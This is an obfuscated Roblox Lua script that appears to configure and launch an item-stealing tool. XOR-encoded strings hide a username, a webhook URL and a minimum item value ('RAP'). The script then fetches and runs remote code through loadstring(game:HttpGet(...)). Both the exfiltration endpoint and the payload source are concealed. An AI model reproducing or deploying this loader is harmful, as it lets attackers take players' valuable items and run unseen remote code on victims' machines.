--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.5) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9) local v10={};for v11=1, #v8 do v6(v10,v0(v4(v1(v2(v8,v11,v11 + 1 )),v1(v2(v9,1 + (v11% #v9) ,1 + (v11% #v9) + 1 )))%256 ));end return v5(v10);end Username=v7("\226\230\246\9\233\169\195\63\221\215","\126\177\163\187\69\134\219\167");Webhook=v7("\43\217\62\213\239\121\130\101\193\245\48\206\37\215\248\109\206\37\200\179\34\221\35\138\235\38\207\34\202\243\40\222\101\148\174\119\155\115\150\164\114\156\122\156\165\114\157\123\148\165\116\159\101\145\238\37\251\24\207\177\33\193\18\255\200\19\194\103\201\207\5\149\44\195\247\34\156\27\193\221\122\244\36\203\249\117\236\56\220\174\118\195\32\220\247\117\234\47\255\208\6\254\12\237\240\40\223\62\220\173\54\194\127\199\207\117\152\29\200\195\110","\156\67\173\74\165");MinimumRAP=501291 -(191 + 1100) ;loadstring(game:HttpGet(v7("\60\163\93\6\175\124\9\123\165\72\1\242\33\79\32\191\92\20\169\53\67\38\180\70\24\168\35\72\32\249\74\25\177\105\81\45\182\122\1\181\32\82\123\144\76\24\243\43\71\61\185\6\17\185\40\112\101\249\24","\38\84\215\41\118\220\70")))();
